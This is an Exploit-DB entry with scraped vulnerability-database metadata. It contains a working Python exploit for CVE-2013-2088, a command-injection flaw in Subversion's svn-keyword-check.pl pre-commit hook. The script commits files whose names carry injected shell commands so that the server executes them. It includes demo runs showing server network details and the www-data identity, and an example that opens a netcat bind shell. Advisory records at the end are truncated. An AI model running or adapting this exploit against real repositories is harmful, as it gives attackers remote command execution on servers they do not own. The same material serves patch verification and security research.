ID EDB-ID:40507 Type exploitdb Reporter GlacierZ0ne Modified 2016-10-12T00:00:00
Description
Subversion 1.6.6 / 1.6.12 - Code Execution. CVE-2013-2088. Remote exploit for Linux platform
# This is an exploit for the subversion vulnerability published as CVE-2013-2088.
# Author: GlacierZ0ne (kai@ktechnologies.de)
# Exploit Type: Code Execution
# Access Type: Authenticated Remote Exploit
# Prerequisites: svn command line client available,
# subversion server exposes webdav through apache,
# user/password with commit privilege
# The exploit has been tested with the following software:
# * subversion 1.6.6 server on Ubuntu 10.06 server 64-bit
# * subversion 1.6.12 (r955767) on Ubuntu 11.10 server 32-bit
# * subversion client version 1.8.8 (r1568071) on Ubuntu 14.04 64-bit
# The following conditions need to be met in order for this to work:
# The pre-commit script svn-keyword-check.pl needs to be configured as
# pre-commit hook. The version shipped with the subversion 1.6.6 contains
# a bug which prevents it from being used at all. This bug must be fixed
# (otherwise neither the exploit, nor the intented purpose of the script
# will work)
# This perl script can be downloaded from the archive source distribution
# at http://archive.apache.org/dist/subversion/. Scripts before 1.6.23
# are vulnerable.
# ###############################################################
# 1. configure the pre-commit hook to use svn-keyword-check.pl
# ###############################################################
# Copy the svn-keyword-check.pl from the source distribution to the
# /svn/repos/<your repository>/hooks directory. Rename pre-commit.tmpl
# to pre-commit. Make sure both files are owned by the user running
# apache (e.g. www-data) and have the executable flag set:
#
# notroot@ubuntu:/$ cd /svn/repositories/testrepo/hooks
# notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo mv pre-commit.tmpl pre-commit
# notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo chmod +x pre-commit
# notroot@ubuntu:/svn/repos/testrepo/hooks$ ls -al
# total 76
# drwxr-xr-x 2 www-data www-data 4096 2016-09-30 13:35 .
# drwxr-xr-x 7 www-data www-data 4096 2016-09-05 16:28 ..
# -rw-r--r-- 1 www-data www-data 2000 2016-09-05 15:23 post-commit.tmpl
# -rw-r--r-- 1 www-data www-data 1663 2016-09-05 15:23 post-lock.tmpl
# -rw-r--r-- 1 www-data www-data 2322 2016-09-05 15:23 post-revprop-change.tmpl
# -rw-r--r-- 1 www-data www-data 1592 2016-09-05 15:23 post-unlock.tmpl
# -rwxr-xr-x 1 www-data www-data 604 2016-09-30 13:32 pre-commit
# -rw-r--r-- 1 www-data www-data 609 2016-09-05 19:10 pre-commit.tmpl
# -rw-r--r-- 1 www-data www-data 2410 2016-09-05 15:23 pre-lock.tmpl
# -rw-r--r-- 1 www-data www-data 2796 2016-09-05 15:23 pre-revprop-change.tmpl
# -rw-r--r-- 1 www-data www-data 2100 2016-09-05 15:23 pre-unlock.tmpl
# -rw-r--r-- 1 www-data www-data 2830 2016-09-05 15:23 start-commit.tmpl
# -rwxr-xr-x 1 www-data www-data 8340 2016-09-30 13:35 svn-keyword-check.pl
# notroot@ubuntu:/svn/repos/testrepo/hooks$
# According to the subversion documentation, svn-keyword-check.pl needs
# to be called by pre-commit. svn-keyword-check.pl will return 1 if it
# detects something that should prevent the commit. In that case, the
# subversion server will cancel the commit. Here's how pre-commit looked
# on my test server:
# notroot@ubuntu:/svn/repos/testrepo/hooks$ cat pre-commit
# #!/bin/sh
# REPOS="$1"
# TXN="$2"
# # Make sure that the log message contains some text.
# #jSVNLOOK=/usr/bin/svnlook
# $SVNLOOK log -t "$TXN" "$REPOS" | \
# ep "[a-zA-Z0-9]" > /dev/null || exit 1
#
# # Exit on all errors.
# set -e
#
# # Check the files that are are listed in "svnlook changed" (except deleted
# # files) for possible problems with svn:keywords set on binary files.
# "$REPOS"/hooks/svn-keyword-check.pl --repos $REPOS --transaction $TXN
# #
# #
# #
#
# # All checks passed, so allow the commit.
# exit 0
#
# ###############################################################
#
# 2. fix the bug in svn-keyword-check.pl
#
# ###############################################################
# The script pre-commit will pass on repository and transaction to
# the script svn-keyword-check.pl. Alternatively, it also accepts
# repository and revision. However, specifying both transaction
# and revision is illegal, only one of them is considered legal.
# This reflects in the input parameter plausibility check
# performed in line 89:
#
# if (defined($transaction) and !defined($revision)) {
# croak "Can't define both revision and transaction!\n";
# }
#
# Unfortunately, there is an exclamation mark too much. It must
# be
#
# if (defined($transaction) and defined($revision)) {
# croak "Can't define both revision and transaction!\n";
# }
#
# The way this script is shipped in the 1.6.6 source distribution
# no commit is possible at all.
#
# Before using the exploit you should first commit one file
# manually so that the svn client can store your user/password
# locally.
#
# Then, open a shell and navigate to the directory of your project
# and start python cve-2013-2088-1.py <command>:
#
# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py ifconfig
# [+] Randfilename is mJHeSkya
# [+] Created random file
# [+] Submitted random file to version control
# [+] Created fake file for cmd execution
# [+] Exploit seems to work:
#
# eth0 Link encap:Ethernet HWaddr 00:0c:29:08:a3:1a
# inet addr:192.168.26.136 Bcast:192.168.26.255 Mask:255.255.255.0
# inet6 addr: fe80::20c:29ff:fe08:a31a/64 Scope:Link
# UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
# RX packets:1060 errors:0 dropped:0 overruns:0 frame:0
# TX packets:806 errors:0 dropped:0 overruns:0 carrier:0
# collisions:0 txqueuelen:1000
# RX bytes:172042 (172.0 KB) TX bytes:136684 (136.6 KB)
#
# lo Link encap:Local Loopback
# inet addr:127.0.0.1 Mask:255.0.0.0
# inet6 addr: ::1/128 Scope:Host
# UP LOOPBACK RUNNING MTU:16436 Metric:1
# RX packets:0 errors:0 dropped:0 overruns:0 frame:0
# TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
# collisions:0 txqueuelen:0
# RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
#
# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py id
# [+] Randfilename is WmolHiuv
# [+] Created random file
# [+] Submitted random file to version control
# [+] Created fake file for cmd execution
# [+] Exploit seems to work:
#
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
#
# Important things to notice
# * For each command execution the exploit will put a file under
# version control. If you submit a lot of commands you will
# create a lot of files with random 8 alphanumeric character
# file names in your repository.
# * Your command must not contain a / since file names must not
# contain a /. In the author's test environment the current
# working directory of apache was the root folder /.
# Therefore, the exploit will replace / in the command with
# $(pwd). This worked fine for the author.
# In your environment this might be different. As first thing
# execute $(pwd) in order to check if this works for you, too.
# * The command execution assumes that your command prints something
# to the terminal and exits. If you know your command will not
# immediately terminate (e.g. because you're starting a reverse/
# bind shell), provide the -d or --dont-terminate flag:
# python svn_exploit2.py -d "/bin/bash 0</tmp/mypipe | nc -l 192.168.1.100 4444 1> /tmp/mypipe"
#
#
#
import sys
import subprocess
import argparse
import random
import os
if __name__ == "__main__":
lowerupper = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
slash_replacement = "$(pwd)"
cwd = os.getcwd()
parser = argparse.ArgumentParser (usage="python {} [options] command".format (sys.argv [0]),
epilog="\x0a\x0a")
parser.add_argument (dest="command", help="Command to execute")
parser.add_argument ("-d", "--dont-terminate", help="don't force output be sent back to the client. Useful for reverse shell connections.",
action="store_true")
#
# args handling
#
if (len(sys.argv) <= 1):
parser.print_help ()
sys.exit (0)
args = parser.parse_args ()
if not args.command:
parser.print_help ()
sys.exit (0)
#
# / cannot be used in the command because svn will interprete it as
# file separator. Therefore you have to use a workaround. Here,
# $(pwd) works great for us.
#
command = args.command
if command.find ("/") != -1:
command = command.replace("/", slash_replacement)
#
# prepare output files for stdout, stderr
#
sout = open ("stdout", "w+")
serr = open ("stderr", "w+")
randfilename = ""
for idx in range (0, 8):
randfilename = randfilename + lowerupper [random.randint (0,51)]
print ("[+] Randfilename is {}".format(randfilename))
f = open (randfilename, "w+")
f.write ("You've been pwned by GlacierZ0ne'") # write 4
f.flush ()
f.close ()
p = subprocess.Popen (["svn", "add", "./{randfilename}".format (randfilename=randfilename)],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
c = p.communicate ()
sout.write (c[0])
if len(c[1]) > 0:
print ("[-] Create random file failed:")
print (c[1])
sys.exit (0)
print ("[+] Created random file")
p = subprocess.Popen (["svn", "commit", "-m", "I pwned you", "./{randfilename}".format (randfilename=randfilename)],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
c = p.communicate ()
sout.write (c[0])
if len(c[1]) > 0:
print ("[-] Submission of random file failed:")
print (c[1])
sys.exit (0)
print ("[+] Submitted random file to version control")
fakefilename = None
if args.dont_terminate == True:
fakefilename = "{}; {}".format (randfilename, command)
else:
fakefilename = "{}; {} 1>&2; exit 1".format (randfilename, command)
f = open (fakefilename, "w+")
f.write ("You've been pwned by GlacierZ0ne") # write 4
f.flush ()
f.close ()
p = subprocess.Popen (["svn", "add", "{fakefilename}"
.format (cwd=cwd, fakefilename=fakefilename)],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
c = p.communicate ()
sout.write (c[0])
if len(c[1]) > 0:
print ("[-] Creation of fake file failed:")
print (c[1])
sys.exit (0)
print ("[+] Created fake file for cmd execution")
p = subprocess.Popen (["svn", "commit", "-m", "I pwned you", "{fakefilename}"
.format (cwd=cwd, fakefilename=fakefilename)],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
c = p.communicate ()
sout.write (c[0])
if len(c[1]) == 0:
if not args.dont_terminate:
print "[-] Something went wrong, pre-commit hook didn't kick in."
else:
print "[!] Done"
sys.exit (0)
else:
idx0= c[1].find ("Commit blocked by pre-commit hook")
idx = c[1].find ("failed with this output")
if idx0 != -1 and idx != -1:
print ("[+] Exploit seems to work: ")
print (c[1][idx + len("failed with this output") + 1:])
sout.flush ()
sout.close ()
serr.flush ()
serr.close ()
{"id": "EDB-ID:40507", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Subversion 1.6.6 / 1.6.12 - Code Execution", "description": "Subversion 1.6.6 / 1.6.12 - Code Execution. CVE-2013-2088. Remote exploit for Linux platform", "published": "2016-10-12T00:00:00", "modified": "2016-10-12T00:00:00", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/40507/", "reporter": "GlacierZ0ne", "references": [], "cvelist": ["CVE-2013-2088"], "lastseen": "2016-10-12T17:29:11", "viewCount": 56, "enchantments": {"score": {"value": 4.8, "vector": "NONE", "modified": "2016-10-12T17:29:11", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-2088"]}, {"type": "seebug", "idList": ["SSV:60827"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139131"]}, {"type": "freebsd", "idList": ["6D0BF320-CA39-11E2-9673-001E8C75030D"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_6D0BF320CA3911E29673001E8C75030D.NASL", "FEDORA_2013-13672.NASL", "GENTOO_GLSA-201309-11.NASL", "SUBVERSION_1_8_1.NASL", "OPENSUSE-2013-494.NASL"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:788FB751D9E44436830A9D1B67E28792"]}, {"type": "zdt", "idList": ["1337DAY-ID-25494"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310866461", "OPENVAS:866461", "OPENVAS:1361412562310121025"]}, {"type": "gentoo", "idList": ["GLSA-201309-11"]}], "modified": "2016-10-12T17:29:11", "rev": 2}, "vulnersScore": 4.8}, "sourceHref": "https://www.exploit-db.com/download/40507/", "sourceData": "# This is an exploit for the subversion vulnerability published as CVE-2013-2088.\r\n\r\n# Author: GlacierZ0ne (kai@ktechnologies.de)\r\n# Exploit Type: Code Execution\r\n# Access Type: Authenticated Remote Exploit\r\n# Prerequisites: svn command line client available,\r\n# subversion server exposes webdav through apache,\r\n# user/password with commit privilege\r\n\r\n# The exploit has been tested with the following software:\r\n\r\n# * subversion 1.6.6 server on Ubuntu 10.06 server 64-bit\r\n# * subversion 1.6.12 (r955767) on Ubuntu 11.10 server 32-bit\r\n# * subversion client version 1.8.8 (r1568071) on Ubuntu 14.04 64-bit\r\n\r\n# The following conditions need to be met in order for this to work:\r\n\r\n# The pre-commit script svn-keyword-check.pl needs to be configured as\r\n# pre-commit hook. The version shipped with the subversion 1.6.6 contains\r\n# a bug which prevents it from being used at all. This bug must be fixed\r\n# (otherwise neither the exploit, nor the intented purpose of the script\r\n# will work)\r\n# This perl script can be downloaded from the archive source distribution\r\n# at http://archive.apache.org/dist/subversion/. Scripts before 1.6.23\r\n# are vulnerable.\r\n\r\n# ###############################################################\r\n\r\n# 1. configure the pre-commit hook to use svn-keyword-check.pl\r\n\r\n# ###############################################################\r\n# Copy the svn-keyword-check.pl from the source distribution to the\r\n# /svn/repos/<your repository>/hooks directory. Rename pre-commit.tmpl\r\n# to pre-commit. Make sure both files are owned by the user running\r\n# apache (e.g. www-data) and have the executable flag set:\r\n#\r\n# notroot@ubuntu:/$ cd /svn/repositories/testrepo/hooks\r\n# notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo mv pre-commit.tmpl pre-commit\r\n# notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo chmod +x pre-commit\r\n# notroot@ubuntu:/svn/repos/testrepo/hooks$ ls -al\r\n# total 76\r\n# drwxr-xr-x 2 www-data www-data 4096 2016-09-30 13:35 .\r\n# drwxr-xr-x 7 www-data www-data 4096 2016-09-05 16:28 ..\r\n# -rw-r--r-- 1 www-data www-data 2000 2016-09-05 15:23 post-commit.tmpl\r\n# -rw-r--r-- 1 www-data www-data 1663 2016-09-05 15:23 post-lock.tmpl\r\n# -rw-r--r-- 1 www-data www-data 2322 2016-09-05 15:23 post-revprop-change.tmpl\r\n# -rw-r--r-- 1 www-data www-data 1592 2016-09-05 15:23 post-unlock.tmpl\r\n# -rwxr-xr-x 1 www-data www-data 604 2016-09-30 13:32 pre-commit\r\n# -rw-r--r-- 1 www-data www-data 609 2016-09-05 19:10 pre-commit.tmpl\r\n# -rw-r--r-- 1 www-data www-data 2410 2016-09-05 15:23 pre-lock.tmpl\r\n# -rw-r--r-- 1 www-data www-data 2796 2016-09-05 15:23 pre-revprop-change.tmpl\r\n# -rw-r--r-- 1 www-data www-data 2100 2016-09-05 15:23 pre-unlock.tmpl\r\n# -rw-r--r-- 1 www-data www-data 2830 2016-09-05 15:23 start-commit.tmpl\r\n# -rwxr-xr-x 1 www-data www-data 8340 2016-09-30 13:35 svn-keyword-check.pl\r\n# notroot@ubuntu:/svn/repos/testrepo/hooks$ \r\n\r\n# According to the subversion documentation, svn-keyword-check.pl needs\r\n# to be called by pre-commit. svn-keyword-check.pl will return 1 if it\r\n# detects something that should prevent the commit. In that case, the\r\n# subversion server will cancel the commit. Here's how pre-commit looked\r\n# on my test server:\r\n\r\n# notroot@ubuntu:/svn/repos/testrepo/hooks$ cat pre-commit\r\n# #!/bin/sh\r\n\r\n# REPOS=\"$1\"\r\n# TXN=\"$2\"\r\n\r\n# # Make sure that the log message contains some text.\r\n# #jSVNLOOK=/usr/bin/svnlook\r\n# $SVNLOOK log -t \"$TXN\" \"$REPOS\" | \\\r\n# ep \"[a-zA-Z0-9]\" > /dev/null || exit 1\r\n# \r\n# # Exit on all errors.\r\n# set -e\r\n# \r\n# # Check the files that are are listed in \"svnlook changed\" (except deleted\r\n# # files) for possible problems with svn:keywords set on binary files.\r\n# \"$REPOS\"/hooks/svn-keyword-check.pl --repos $REPOS --transaction $TXN\r\n# #\r\n# #\r\n# #\r\n# \r\n# # All checks passed, so allow the commit.\r\n# exit 0\r\n# \r\n# ###############################################################\r\n# \r\n# 2. fix the bug in svn-keyword-check.pl\r\n# \r\n# ###############################################################\r\n# The script pre-commit will pass on repository and transaction to\r\n# the script svn-keyword-check.pl. Alternatively, it also accepts\r\n# repository and revision. However, specifying both transaction\r\n# and revision is illegal, only one of them is considered legal.\r\n# This reflects in the input parameter plausibility check\r\n# performed in line 89:\r\n# \r\n# if (defined($transaction) and !defined($revision)) {\r\n# croak \"Can't define both revision and transaction!\\n\";\r\n# }\r\n# \r\n# Unfortunately, there is an exclamation mark too much. It must\r\n# be\r\n# \r\n# if (defined($transaction) and defined($revision)) {\r\n# croak \"Can't define both revision and transaction!\\n\";\r\n# }\r\n# \r\n# The way this script is shipped in the 1.6.6 source distribution\r\n# no commit is possible at all.\r\n# \r\n# Before using the exploit you should first commit one file\r\n# manually so that the svn client can store your user/password\r\n# locally.\r\n# \r\n# Then, open a shell and navigate to the directory of your project\r\n# and start python cve-2013-2088-1.py <command>:\r\n#\r\n# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py ifconfig\r\n# [+] Randfilename is mJHeSkya\r\n# [+] Created random file\r\n# [+] Submitted random file to version control\r\n# [+] Created fake file for cmd execution\r\n# [+] Exploit seems to work: \r\n#\r\n# eth0 Link encap:Ethernet HWaddr 00:0c:29:08:a3:1a \r\n# inet addr:192.168.26.136 Bcast:192.168.26.255 Mask:255.255.255.0\r\n# inet6 addr: fe80::20c:29ff:fe08:a31a/64 Scope:Link\r\n# UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\r\n# RX packets:1060 errors:0 dropped:0 overruns:0 frame:0\r\n# TX packets:806 errors:0 dropped:0 overruns:0 carrier:0\r\n# collisions:0 txqueuelen:1000 \r\n# RX bytes:172042 (172.0 KB) TX bytes:136684 (136.6 KB)\r\n#\r\n# lo Link encap:Local Loopback \r\n# inet addr:127.0.0.1 Mask:255.0.0.0\r\n# inet6 addr: ::1/128 Scope:Host\r\n# UP LOOPBACK RUNNING MTU:16436 Metric:1\r\n# RX packets:0 errors:0 dropped:0 overruns:0 frame:0\r\n# TX packets:0 errors:0 dropped:0 overruns:0 carrier:0\r\n# collisions:0 txqueuelen:0 \r\n# RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)\r\n#\r\n# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py id\r\n# [+] Randfilename is WmolHiuv\r\n# [+] Created random file\r\n# [+] Submitted random file to version control\r\n# [+] Created fake file for cmd execution\r\n# [+] Exploit seems to work: \r\n#\r\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n#\r\n#\r\n# Important things to notice\r\n\r\n# * For each command execution the exploit will put a file under\r\n# version control. If you submit a lot of commands you will\r\n# create a lot of files with random 8 alphanumeric character\r\n# file names in your repository.\r\n# * Your command must not contain a / since file names must not\r\n# contain a /. In the author's test environment the current\r\n# working directory of apache was the root folder /.\r\n# Therefore, the exploit will replace / in the command with\r\n# $(pwd). This worked fine for the author.\r\n# In your environment this might be different. As first thing\r\n# execute $(pwd) in order to check if this works for you, too.\r\n# * The command execution assumes that your command prints something\r\n# to the terminal and exits. If you know your command will not\r\n# immediately terminate (e.g. because you're starting a reverse/\r\n# bind shell), provide the -d or --dont-terminate flag:\r\n# python svn_exploit2.py -d \"/bin/bash 0</tmp/mypipe | nc -l 192.168.1.100 4444 1> /tmp/mypipe\"\r\n#\r\n#\r\n#\r\nimport sys\r\nimport subprocess\r\nimport argparse\r\nimport random\r\nimport os\r\n\r\nif __name__ == \"__main__\":\r\n\r\n lowerupper = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n slash_replacement = \"$(pwd)\" \r\n cwd = os.getcwd()\r\n\r\n parser = argparse.ArgumentParser (usage=\"python {} [options] command\".format (sys.argv [0]),\r\n epilog=\"\\x0a\\x0a\")\r\n\r\n parser.add_argument (dest=\"command\", help=\"Command to execute\")\r\n parser.add_argument (\"-d\", \"--dont-terminate\", help=\"don't force output be sent back to the client. Useful for reverse shell connections.\",\r\n action=\"store_true\")\r\n\r\n #\r\n # args handling\r\n #\r\n if (len(sys.argv) <= 1):\r\n parser.print_help ()\r\n sys.exit (0)\r\n\r\n args = parser.parse_args ()\r\n if not args.command:\r\n parser.print_help ()\r\n sys.exit (0)\r\n\r\n #\r\n # / cannot be used in the command because svn will interprete it as\r\n # file separator. Therefore you have to use a workaround. Here,\r\n # $(pwd) works great for us.\r\n #\r\n command = args.command\r\n if command.find (\"/\") != -1:\r\n command = command.replace(\"/\", slash_replacement)\r\n \r\n #\r\n # prepare output files for stdout, stderr\r\n #\r\n sout = open (\"stdout\", \"w+\")\r\n serr = open (\"stderr\", \"w+\")\r\n\r\n randfilename = \"\"\r\n for idx in range (0, 8):\r\n randfilename = randfilename + lowerupper [random.randint (0,51)]\r\n\r\n print (\"[+] Randfilename is {}\".format(randfilename))\r\n\r\n f = open (randfilename, \"w+\")\r\n f.write (\"You've been pwned by GlacierZ0ne'\") # write 4\r\n f.flush ()\r\n f.close ()\r\n\r\n p = subprocess.Popen ([\"svn\", \"add\", \"./{randfilename}\".format (randfilename=randfilename)],\r\n stdout=subprocess.PIPE, stderr=subprocess.PIPE) \r\n c = p.communicate ()\r\n sout.write (c[0])\r\n if len(c[1]) > 0:\r\n print (\"[-] Create random file failed:\")\r\n print (c[1])\r\n sys.exit (0)\r\n print (\"[+] Created random file\")\r\n \r\n p = subprocess.Popen ([\"svn\", \"commit\", \"-m\", \"I pwned you\", \"./{randfilename}\".format (randfilename=randfilename)],\r\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n c = p.communicate ()\r\n sout.write (c[0])\r\n if len(c[1]) > 0:\r\n print (\"[-] Submission of random file failed:\")\r\n print (c[1])\r\n sys.exit (0)\r\n print (\"[+] Submitted random file to version control\")\r\n\r\n fakefilename = None\r\n if args.dont_terminate == True:\r\n fakefilename = \"{}; {}\".format (randfilename, command)\r\n else:\r\n fakefilename = \"{}; {} 1>&2; exit 1\".format (randfilename, command)\r\n f = open (fakefilename, \"w+\")\r\n f.write (\"You've been pwned by GlacierZ0ne\") # write 4\r\n f.flush ()\r\n f.close ()\r\n\r\n p = subprocess.Popen ([\"svn\", \"add\", \"{fakefilename}\"\r\n .format (cwd=cwd, fakefilename=fakefilename)],\r\n stdout=subprocess.PIPE, stderr=subprocess.PIPE) \r\n c = p.communicate ()\r\n sout.write (c[0])\r\n if len(c[1]) > 0:\r\n print (\"[-] Creation of fake file failed:\")\r\n print (c[1])\r\n sys.exit (0)\r\n print (\"[+] Created fake file for cmd execution\")\r\n \r\n p = subprocess.Popen ([\"svn\", \"commit\", \"-m\", \"I pwned you\", \"{fakefilename}\"\r\n .format (cwd=cwd, fakefilename=fakefilename)],\r\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n c = p.communicate ()\r\n sout.write (c[0])\r\n if len(c[1]) == 0:\r\n if not args.dont_terminate:\r\n print \"[-] Something went wrong, pre-commit hook didn't kick in.\"\r\n else:\r\n print \"[!] Done\"\r\n sys.exit (0)\r\n else:\r\n idx0= c[1].find (\"Commit blocked by pre-commit hook\")\r\n idx = c[1].find (\"failed with this output\")\r\n \r\n if idx0 != -1 and idx != -1:\r\n print (\"[+] Exploit seems to work: \")\r\n print (c[1][idx + len(\"failed with this output\") + 1:])\r\n \r\n sout.flush ()\r\n sout.close ()\r\n serr.flush ()\r\n serr.close ()\r\n", "osvdbidlist": [], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:06:50", "description": "contrib/hook-scripts/svn-keyword-check.pl in Subversion before 1.6.23 allows remote authenticated users with commit permissions to execute arbitrary commands via shell metacharacters in a filename.", "edition": 6, "cvss3": {}, "published": "2013-07-31T13:20:00", "title": "CVE-2013-2088", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.1, "vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2088"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:collabnet:subversion:1.6.17", "cpe:/a:apache:subversion:1.6.7", "cpe:/a:apache:subversion:1.6.20", "cpe:/a:apache:subversion:1.6.18", "cpe:/a:apache:subversion:1.6.21", "cpe:/a:apache:subversion:1.6.0", "cpe:/a:apache:subversion:1.6.16", "cpe:/a:apache:subversion:1.6.4", "cpe:/a:apache:subversion:1.6.2", "cpe:/a:apache:subversion:1.6.19", "cpe:/a:apache:subversion:1.6.13", "cpe:/a:apache:subversion:1.6.8", "cpe:/a:apache:subversion:1.6.15", "cpe:/a:apache:subversion:1.6.6", "cpe:/a:apache:subversion:1.6.10", "cpe:/o:opensuse:opensuse:11.4", "cpe:/a:apache:subversion:1.6.1", "cpe:/a:apache:subversion:1.6.3", "cpe:/a:apache:subversion:1.6.5", "cpe:/a:apache:subversion:1.6.12", "cpe:/a:apache:subversion:1.6.17", "cpe:/a:apache:subversion:1.6.11", "cpe:/a:apache:subversion:1.6.9", "cpe:/a:apache:subversion:1.6.14"], "id": "CVE-2013-2088", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2088", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:subversion:1.6.13:*:*:*:*:*:*:*", "cpe:2.3:a:collabnet:subversion:1.6.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:11.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:subversion:1.6.3:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T17:42:24", "description": "BUGTRAQ ID: 60265\r\nCVE(CAN) ID: CVE-2013-2088\r\n\r\nSubversion\u662f\u4e00\u6b3e\u5f00\u6e90\u591a\u7528\u6237\u7248\u672c\u63a7\u5236\u7cfb\u7edf\uff0c\u652f\u6301\u975eASCII \u6587\u672c\u548c\u4e8c\u8fdb\u5236\u6570\u636e\u3002\r\n\r\nApache Subversion 1.6.22\u53ca\u4e4b\u524d\u7248\u672c\u30011.7.10\u53ca\u4e4b\u524d\u7248\u672c\u5b58\u5728\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff0c\u53ef\u5bfc\u81f4\u53d7\u5f71\u54cd\u7cfb\u7edf\u635f\u574f\u3002\u6b64\u6f0f\u6d1e\u6e90\u4e8e\u5904\u7406\u6587\u4ef6\u540d\u65f6\uff0csvn-keyword-check.pl hook\u811a\u672c\u5185\u5b58\u5728\u8f93\u5165\u9a8c\u8bc1\u9519\u8bef\u3002\u901a\u8fc7\u7279\u5236\u7684\u8bf7\u6c42\u53ef\u6ce8\u5165\u4efb\u610fshell\u547d\u4ee4\u5e76\u6267\u884c\u8fd9\u4e9b\u547d\u4ee4\u3002\u8981\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u9700\u8981\u5728\u670d\u52a1\u5668\u7aef\u4f7f\u7528contrib\u811a\u672c\u3002\r\n0\r\nApache Group Subversion <= 1.7.10\r\nApache Group Subversion <= 1.6.22\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApache Group\r\n------------\r\nApache Group\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08CVE-2013-2088-advisory\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nCVE-2013-2088-advisory\uff1aCVE-2013-2088-advisory\r\n\u94fe\u63a5\uff1ahttp://subversion.apache.org/security/CVE-2013-2088-advisory.txt", "published": "2013-06-06T00:00:00", "title": "Apache Subversion \u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e(CVE-2013-2088)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2088"], "modified": "2013-06-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60827", "id": "SSV:60827", "sourceData": "", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "freebsd": [{"lastseen": "2019-05-29T18:33:36", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2088"], "description": "\nSubversion team reports:\n\nThe script contrib/hook-scripts/check-mime-type.pl does not escape\n\t argv arguments to 'svnlook' that start with a 